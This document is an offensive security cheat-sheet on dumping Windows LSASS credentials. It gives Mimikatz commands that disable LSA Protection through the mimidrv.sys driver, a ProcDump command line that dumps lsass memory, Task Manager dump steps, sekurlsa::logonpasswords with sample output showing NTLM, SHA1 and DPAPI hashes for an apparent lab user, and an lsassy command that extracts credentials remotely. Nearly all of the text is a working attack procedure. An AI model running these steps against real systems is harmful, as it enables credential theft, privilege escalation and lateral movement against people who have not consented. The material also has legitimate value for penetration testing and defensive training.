LSASS
Local Security Authority Server Service (LSASS) is a Windows Process that handles the Operating System Security Policy and Enforces it on a System. It verifies Logged-in Accounts and ensures Passwords, Hashes, and Kerberos Tickets.
Windows System stores Credentials in the LSASS Process to enable Users to access Network Resources, such as File Shares, SharePoint Sites, and other Network Services, without entering Credentials every time a User Connects.
Protected LSASS
AdministratorsIn 2012, Microsoft implemented an LSA Protection, to keep LSASS from being accessed to extract Credentials from Memory. We can Disable the Protection using Mimikatz.
- Mimikatz
- Output
privilege::debug
:: If the LSA Protection is Enabled, we will get an Error
sekurlsa::logonpasswords
:: Import a Driver [mimidrv.sys] that works on Kernel Level to Disable the LSA Protection
!+
:: Once the Driver is Loaded we can Disable the LSA Protection
!processprotect /process:lsass.exe /remove
Privilege '20' OK
:: This Means that the LSA Protection is Enabled
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
[*] 'mimidrv' Service not Present
[+] 'mimidrv' Service Successfully Registered
[+] 'mimidrv' Service ACL to Everyone
[+] 'mimidrv' Service Started
Process : lsass.exe
PID 600 -> 00/00 [0-0-0]
Dumping LSASS Credentials
AdministratorsThe LSASS is commonly abused to Dump Credentials to either Escalate Privileges, Steal Data, or Move Laterally. If we have Administrator Privileges, we can Dump the Process memory of LSASS. Windows System allows us to create a Dump File, a Snapshot of a given Process. This could be done either with the Desktop Access (GUI) or the Command Prompt.
Graphic User Interface (GUI)
Dump any Running Windows Process using the GUI.
Windows Task Manager:- Click on Details Tab.
- Find the Required Process.
- Right-Click and select Create Dump File.
Once the Dumping Process is Finished, a Pop-Up Message will show containing the Path of the Dumped File. Now we can copy the File and Transfer it to Our Machine to extract NTLM Hashes Offline.
Sysinternals Suite
Sysinternals Suite must be Installed on the System The Dump Process is writing to Disk. Dumping the LSASS Process is a known Technique used by Adversaries. Thus, Antivirus Products may Flag it as Malicious.
We can Dump a Process with ProcDump. ProcDump is a Sysinternals Process Dump Utility that runs from the Command Prompt.
procdump.exe -accepteula -ma lsass.exe "Dump Output Path"
Mimikatz
To get User's Hashes, a User (Victim) must have Logged in to a System, and the User's Credentials have been Cached.
We can use Mimikatz to Extract the Memory Dump of the lsass.exe Process.
- Mimikatz
- Output
privilege::debug
:: Access the Memory to Dump all Cached Passwords and Hashes from the [lsass.exe] Process
sekurlsa::logonpasswords
Authentication Id : 0 ; 798969 (00000000:000c30f9)
Session : RemoteInteractive from 2
User Name : Mark
Domain : PCDC
Logon Server : ADOBE-HARVEST
Logon Time : 2/28/2023 1:45:47 PM
SID : S-1-5-21-1966530601-3185510712-10604624-1114
msv :
[00000003] Primary
* Username : Mark
* Domain : PCDC
* NTLM : fc525c9683e8fe067095ba2ddc971889
* SHA1 : e53d7244aa8727f5789b01d8959141960aad5d22
* DPAPI : cd09e2e4f70ef660400b8358c52a46b8
tspkg :
wdigest :
* Username : Mark
* Domain : PCDC
* Password : (null)
kerberos :
* Username : Mark
* Domain : PCDC.GREEN
* Password : (null)
ssp :
credman
[...]
Lsassy
NTLM Hash or Valid CredentialsLsassy Python Tool to Remotely Extract Credentials on a set of Hosts. The Tool uses Impacket Project to Remotely Read necessary bytes in lsass Dump and PypyKatz to Extract Credentials.
lsassy -d "Domain" -u "Username" -p "Password" "Target IP" --users